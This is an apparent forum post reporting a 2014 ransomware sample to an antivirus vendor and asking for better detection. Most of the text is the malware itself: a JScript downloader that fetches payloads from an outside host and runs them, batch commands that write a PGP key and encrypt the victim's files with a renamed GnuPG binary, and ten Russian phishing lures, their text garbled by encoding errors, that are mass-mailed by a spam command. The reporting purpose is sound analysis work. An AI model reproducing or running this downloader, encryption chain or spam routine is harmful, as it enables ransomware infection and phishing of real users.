Vbs/troyandownloader.agent.nkm Troyan Horse

[JAMEWT 4]

From 2014/08/05 there is this new RansomWare

 

At 2014/08/06 i have sent you sample and you have add detection and block download of the zip file but eset not detect btc file

https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

 

**********************************************************************************************************

ESET Malware Response Team have the file from 2014/08/06
06/08/2014 20:05:16 Kernel ESET Il file 'D:\A MALWARE\keybtc.btc' è stato inviato a ESET per l'analisi.
*****************************************************************************
 

 

I EXPLAIN

 

This *.JS file after execute it download a lot of files and do a lot of work ..

 

Information thank to @MalwareHunter (malwaretips.com)

 

JS file

////////// autoreplicant bot /////////
///////////////////  var intoxicated twice ////////////////

var nosensetoblock="collapseit.com",tfolder="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell");function autoreply(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="%TEMP%\\keybtc.cmd",autorotatedomain="images";function CreateObject©{return new ActiveXObject©}
var WshShell=CreateObject("WScript.Shell"),tfolder=WshShell.ExpandEnvironmentStrings(tfolder),docrun="%TEMP%\\document.doc";try{autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/document.btc",""+tfolder+"document.doc"),WshShell.Run(""+docrun+"",1,0)}catch(docs){}autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/day.btc",""+tfolder+"day.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/null.btc",""+tfolder+"null.btc");
autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/sad.btc",""+tfolder+"sad.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/keybtc.btc",""+tfolder+"keybtc.cmd");

WshShell.Run(""+genesis+"",0,0);

 

Ok download this file

hXXp://collapseit.com/images/sad.btc-MD5: e189b5ce11618bb7880e9b09d53a588fhttps://www.virustotal.com/it/file/97d27e1225b472a63c88ac9cfb813019b72598b9dd2d70fe93f324f7d034fb95/analysis/1406556814/hxxp://collapseit.com/images/null.btc-MD5: 778232ba5aa586021a27ec2bf4e7b99ahttps://www.virustotal.com/it/file/c201989c78d9f8a8c8a18577b3deb6baf71fbc13594e545015ba96d69da724dc/analysis/1407318858/hxxp://collapseit.com/images/day.btc-MD5: 352369b32c971e1a7f56ef29593abb44https://www.virustotal.com/it/file/1e56cc30ea50c74c6795a9aed142ad5e5fd51ddc17080f948cb23d647c5b8553/analysis/1407196678/hxxp://collapseit.com/images/document.btc-MD5: 50a561c0d0f0c49974dfb15763f73202https://www.virustotal.com/it/file/62a86e1ba6b2d629ec54822c1ca16ef995cd9f18965f03fa918486f2f3795192/analysis/1407320991/hxxp://collapseit.com/images/keybtc.btc-MD5: 3ca63d203556c63d5e0c06d78f6aae4chttps://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/1407331101/

after execute

 

keybtc.btc (after drop: keybtc.cmd)

C:\Users\%UserName%\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Real: genesis 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Comment: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Email: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Version: GnuPG v1 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo.1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo heeVFaBTyAp33AP0EGjRDcg7E4VihowO2zCqJa7QkEfxVLwYKbEiEEnns4VDNnut 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo eOsyHF/ZyiNshYUN3Fj+YiFMtOzEUcJEE0QuUfl2o0Ajl9BRz3cQPPSnUhKS/vmc 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Fut1Y5GcJVWhjl4f51Grp1Q5lB9ndqCVGpG7PZ7tqQgA6934DOjGQQF3BK9ZuSJq 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo v4bMKs12cOndOIFuoim/KV5NL4wXlUes7GIlTp4P3izlobNlVfYKXgS4Vc/H/FiA 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo YVOaB7L4rVXwc7oixYSI1a4TwqXfifDhJNSRABEBAAG0ImtleWJ0YyAoa2V5YnRj 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo KSA8a2V5YnRjQGdtYWlsLmNvbT6JATgEEwECACIFAlPgfZQCGwMGCwkIBwMCBhUI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AgkKCwQWAgMBAh4BAheAAAoJEIUsFvyqtih1ly4IAJlYEiJX2VeXV77c8M/0PRtN 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo XAGmgFjt9WNvnMGlvAY88/QUMwMU9XV2gXTc+KiLacuagofhGpHOuZf3suSBYMDS 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo oi135YTGs1sAWOx2kBwmyW8rrNLZ84V4wa97I9nEbzIYB0thzr3euu0QTz78hj2v 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Gai2uA82F45XFcjXhPKINbSgMCYIpbhfjUCMbSVy8+3rF9fUDWICVwzAof467GOI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo b4SKcDkX5IOzDugDnKXvKwDNr9fcomZhhVUz5djF1TTORc0qXQye2GiFa6ZtE4aH 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo WFw6hKfBIgaJGFIqnr7be0Di1duWisnCYS2n9/VDcZpeOpv7uqc78KDJ+Ogm27W5 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AQ0EU+B9lAEIAMcXK4tuglxptwQKg4aODX8OnSbAyAQW5QHTK9d4GG40vry8IJVx 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo pUYe7fgax7OIkKLnYjo0uNXnBD70e3Z80WhDK1/2eIC4MxqVAD4cKP2yKZOFLKi2 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo BJ7BdYk+y4d2MgqGuGIt84Wp0Zrcs1O32pS2lXfaBxjREaAUuqzy4MU0AJ5+5tK0 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo qeD1OTxJhYivIky/qrmDtMf0G/WzxULV1iy0pkDP/s44KmsQxept3MzmCMgdAXmg 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 2ANdP5r+UOglQeLKBmyLhCAcNqvHPU5I2X5qWmAbU0Z8IT/M1m/SE0/r9VF63C+Y 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo g3HQQDVZYOFWqi2uHOoU/LZ157kgF5gYqNUAEQEAAYkBHwQYAQIACQUCU+B9lAIb 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo DAAKCRCFLBb8qrYodQp3B/0SeVJOLU+3gmq+R7VLqNbeS6NZ9KnZQvda3vyE0/+t 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo FGx3Xo6Gf4chi+hTY33Ph+/4xA0cFg3i2YDSZRunDKG3OavrRDIpF6SNIH/X/sPU 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo IQxATi1Sq/EmNzJdAqqqYNQT7YlWyVjI2pLcbberET+9LHIMcatnQ08GZQDViiSI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo o7fW4sVYMgnRS5OXOwzMqW7wLuLbIGuTZQXTIOAoOhuZtfmy5woCRwF9sygYu5yw 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo iwQkX2P/Ffzwrpu92J8uqoVeUXdBV8bgnK92KKKi/F4czak/DLa453cLlwozPxSv 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 6/RKzQXVaopzuOdvdRTwKSb+mFr+gsMlQ1t7xNcMdW84 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo =yxjK 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----END PGP PUBLIC KEY BLOCK----- 1>>2048key.btc 

C:\Users\%UserName%\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg" 

(Remark: svchost.exe is the dropped null.btc after renaming.)

 

(Create another JS files)

C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.jsC:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js 

Also creates html (filename: ltr*.html) files with links like this:

hxxp://bit.ly/invoice2014- (eset block all download)

C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.js

C:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js

C:\Users\%UserName%\AppData\Local\Temp>copy /b "C:\Users\%UserName%\AppData\Local\Temp\collapse.btc" + "C:\Users\%UserName%\AppData\Local\Temp\tobi.btc" ttl.exe

C:\Users\%UserName%\AppData\Local\Temp>del /f /q tobi.btc   & del /f /q collapse.btc

C:\Users\%UserName%\AppData\Local\Temp>RENAME lsass.btc lsass.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME coherence.btc coherence.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME spoolsv.btc spoolsv.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME spool.btc blat.lib

C:\Users\%UserName%\AppData\Local\Temp>RENAME sv.btc blat.dll

C:\Users\%UserName%\AppData\Local\Temp>ttl.exe -f ttl.pwd

C:\Users\%UserName%\AppData\Local\Temp>taskkill /f /im 1Cv8N.exe

C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\autoreplicant.js"

 

(Remark: These *.btc files dropped by the second js file autoreplicant.js .)

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo КаÐs и дÐlÐlÐlÐ?аN€Ð¸Ð?алиNNS N Ð?аN?иÐL N€N?ÐsÐlÐ?ÐlдNN‚Ð?ÐlÐL, ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL NN‡ÐµN‚ длNZ ÐlÐzлаN‚N‹ (Ð?Ðl Ð?лÐlжеÐ?ии). ОN€ÐlаÐ?изN?ÐaN‚е, ÐzÐlжалN?ÐaNN‚а, ÐzлаN‚еж.<br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo КÐlÐlда бN?N…ÐlалN‚еN€Ð¸NZ Ð?Nе ÐzN€ÐlÐ?едеN‚, ÐlN‚ÐzиN?иN‚еNNS ÐLÐ?е - NZ ÐzN€ÐlÐ?еN€NŽ ÐzN€Ð¸N…Ðlд деÐ?еÐl. <br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo ДÐlÐlÐlÐ?ÐlN€ N? ВаN иÐLееN‚NNZ? Ð?ли ÐLÐ?е Ð?N‹NлаN‚NS ÐsÐlÐzиNŽ? <br><br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice2014">Ð?N‡ÐµN‚_длNZ_ÐlÐzлаN‚N‹ (аÐ?Ðl.).zip</a> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>set RND0=22361

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?и бN?N…ÐlалN‚еN€Ð° ÐzÐlÐzN€ÐlNили ÐzеN€ÐµNлаN‚NS ВаÐL NN‡ÐµN‚ Ð?Ф-14-22361 (NÐL. ÐzN€Ð¸Ð»ÐlжеÐ?ие).<br>Ð’N‹ ÐLÐlÐlли бN‹ N?зÐ?аN‚NS, бN‹Ð»Ð° ли ÐzÐl Ð?еÐLN? ÐlÐzлаN‚а?<br>ÐzÐl даÐ?Ð?N‹ÐL Ð?аN?еÐa базN‹ ÐzÐl NTN‚ÐlÐLN? ÐzлаN‚ежN? за ВаÐLи Ð?иNиN‚ дÐlлÐl. Ð’ÐlзÐLÐlжÐ?Ðl, ÐsаÐsаNZ-N‚Ðl ÐlN?ибÐsа.<br>ÐzN€ÐlÐ?еN€NSN‚е, ÐzÐlжалN?ÐaNN‚а.<br><br> 1>>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice142014">Ð?N‡ÐµN‚ Ð?Ф-14-22361_2014.zip</a> 1>>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐLÐ?ажаеÐLN‹Ðµ ÐsÐlллеÐlи, <br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐ?ÐlдиÐL ежеÐLеNNZN‡Ð?N?NŽ NÐ?еN€ÐsN?. Ð’ ÐzN€Ð¸Ð»ÐlжеÐ?ии - ÐzN€ÐlеÐsN‚ ÐÐsN‚а ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ.<br>Ð?аÐL ÐzÐlлN?N‡Ð°ÐµN‚NNZ дÐlлÐl ÐzN€Ð¸ÐLеN€Ð?Ðl Ð?а 10 N‚N‹N. ÐzN€ÐlÐ?еN€NSN‚е ÐzÐl NÐ?ÐlиÐL базаÐL, Ð?Nе ли ÐzN€Ð°Ð?илNSÐ?Ðl. <br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revise2014">ÐzN€ÐlеÐsN‚ ÐÐsN‚а NÐ?еN€Ðsи-2014.zip</a> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?еN€Ð¸Ð»Ð° ÐlÐzлаN‚N? ÐzÐl NN‚аN€N‹ÐL ÐzÐlNN‚аÐ?ÐsаÐL. <br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo К ÐzиNNSÐLN? ÐzN€Ð¸Ð»ÐlжеÐ?а ÐsÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ. Ð?ÐlÐlлаNÐ?Ðl Ð?аN?еÐa иÐ?N„ÐlN€ÐLаN†Ð¸Ð¸ Ð’N‹ Ð?аÐL Ð?еÐLÐ?ÐlÐlÐl Ð?едÐlÐzлаN‚или ÐzÐl дÐ?N?ÐL NN‡ÐµN‚аÐL.<br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlÐ?еN€NSN‚е N?ÐsазаÐ?Ð?N‹Ðµ даÐ?Ð?N‹Ðµ, ÐzÐlжалN?ÐaNN‚а. <br><br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revisecopy2014">КÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи (2014).zip</a> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐzлаN‚или ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (NÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ Ð? аN‚N‚аN‡Ðµ). ÐzN€ÐlÐ?еN€NSN‚е ÐzN€Ð¸N…Ðlд деÐ?еÐl и ÐlN‚ÐzиN?иN‚еNNS.<br>ÐtадеNŽNNS, N N€ÐµÐsÐ?изиN‚аÐLи Ð?Nе Ð?ÐlN€ÐLалNSÐ?Ðl. <br><br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/scancopy2014">CÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ.zip</a> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?ела ÐzлаN‚еж ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (ÐzлаN‚ежÐsа N ÐlN‚ÐLеN‚ÐsÐlÐa баÐ?Ðsа Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, ÐzN€Ð¸N?ли ли деÐ?NSÐlи. ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/payment20143991">ÐzлаN‚ежÐsа_ÐlN‚ÐLеN‚Ðsа баÐ?Ðsа (aug).zip</a> 1>>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl ДÐlÐlÐlÐ?ÐlN€N? ÐlN‚ 02.08.2014 ÐlÐlда (Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, Ð?Nе ли N‚аÐL Ð?ÐlN€ÐLалNSÐ?Ðl ÐzÐl NÐlдеN€Ð¶Ð°Ð?иNŽ. ЕNли N‡N‚Ðl, ÐLN‹ NÐl NÐ?ÐlеÐa NN‚ÐlN€ÐlÐ?N‹ ÐzÐlдÐzиNN‹Ð?аеÐL  дÐlÐsN?ÐLеÐ?N‚N‹ и Ð?N‹NN‹Ð»Ð°ÐµÐL ВаÐL ÐlN€Ð¸ÐlиÐ?алN‹. <br><br> 1>>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/recandtransmiss2014">ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸.zip</a> 1>>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ Ð?е ÐLÐlжеN‚ Ð?аÐaN‚и Ð?еNÐsÐlлNSÐsÐl ÐÐsN‚ÐlÐ? ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl дÐlÐlÐlÐ?ÐlN€Ð°ÐL, заÐsлNŽN‡ÐµÐ?Ð?N‹ÐL N ВаÐLи.<br>ÐzN€ÐlблеÐLа Ð? N‚ÐlÐL, N‡N‚Ðl N? Ð?аN NÐl дÐ?NZ Ð?а деÐ?NS дÐlлжÐ?а Ð?аN‡Ð°N‚NSNNZ ÐzN€ÐlÐ?еN€Ðsа ФÐtÐ?.<br>ÐsÐlжеN‚е ÐzÐlNÐLÐlN‚N€ÐµN‚NS, еNN‚NS ли N? ВаN ÐlN€Ð¸ÐlиÐ?алN‹ NTN‚иN… дÐlÐsN?ÐLеÐ?N‚ÐlÐ? (NÐsаÐ?N‹ Ð?Ðl Ð?лÐlжеÐ?ии)?<br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlN?N? ÐlN‚Ð?еN‚иN‚NS ÐLаÐsNиÐLалNSÐ?Ðl ÐlÐzеN€Ð°N‚иÐ?Ð?Ðl. Ð?ÐzаNибÐl. <br><br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/rectrans2014">ÐÐsN‚N‹ ÐzÐl ÐzN€Ð¸ÐµÐLN?-ÐzеN€ÐµÐ´N‡Ð¸_2014Ðl.zip</a> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NÐ?NZзи N изÐLеÐ?еÐ?иNZÐLи Ð? N†ÐµÐ?ÐlÐ?ÐlÐa ÐzÐlлиN‚иÐsе Ð?аN?еÐa ÐsÐlÐLÐzаÐ?ии, ÐLN‹ N€Ð°Ð·N€Ð°Ð±ÐlN‚али N‚иÐzÐlÐ?Ðlе дÐlÐzÐlлÐ?иN‚елNSÐ?Ðlе NÐlÐlлаN?еÐ?ие длNZ ÐzÐlдÐzиNаÐ?иNZ N Ð?аN?иÐLи аÐsN‚N?алNSÐ?N‹ÐLи ÐsÐlÐ?N‚N€Ð°ÐlеÐ?N‚аÐLи.<br>ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии и ÐlN‚Ð?еN‚NSN‚е ÐzÐl ÐlÐlN‚ÐlÐ?Ð?ÐlNN‚и ÐzÐlдÐzиNаÐ?иNZ. <br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NлN?N‡Ð°Ðµ Ð?еÐlбN…ÐlдиÐLÐlNN‚и, ÐLN‹ ÐlÐlN‚ÐlÐ?N‹ N€Ð°NNÐLÐlN‚N€ÐµN‚NS ВаN?и ÐzN€Ð°Ð?Ðsи. <br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo Ð?ÐzаNибÐl. <br><br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/supplementaryagr3381">Ð?иÐzÐlÐ?Ðlе дÐlÐz.NÐlÐlлаN?еÐ?ие.zip</a> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ ÐzN€ÐlдÐlлжеÐ?ие ÐzеN€ÐµÐlÐlÐ?ÐlN€ÐlÐ? N Ð?аN?иÐL диN€ÐµÐsN‚ÐlN€ÐlÐL, Ð?аÐzN€Ð°Ð?лNZNŽ ВаÐL длNZ N€Ð°NNÐLÐlN‚N€ÐµÐ?иNZ ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии). ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL.<br>ÐzN€ÐlNNSба иNÐzN€Ð°Ð?леÐ?иNZ Ð?Ð?ÐlNиN‚NS Ð? N€ÐµÐ¶Ð¸ÐLе ÐzN€Ð°Ð?ÐlÐs.<br><br>Ð?ÐzаNибÐl<br><br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/draft77182">ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (2014Ðl).zip</a> 1>>ltr10.html

echo spoolsv.exe ltr!R!.html -server smtp.mail.ru -port 587 -f !validmail! -u !validmail! -pw !Spamail! -priority 1 -sensitivity 2 -noh -noh2 -ss -html -to %a 1>>readbook.cmd )  
 

*There are some more commands like this. It seems that this script sends spams also...

 

 

 

And finally... delete a lot of files and link

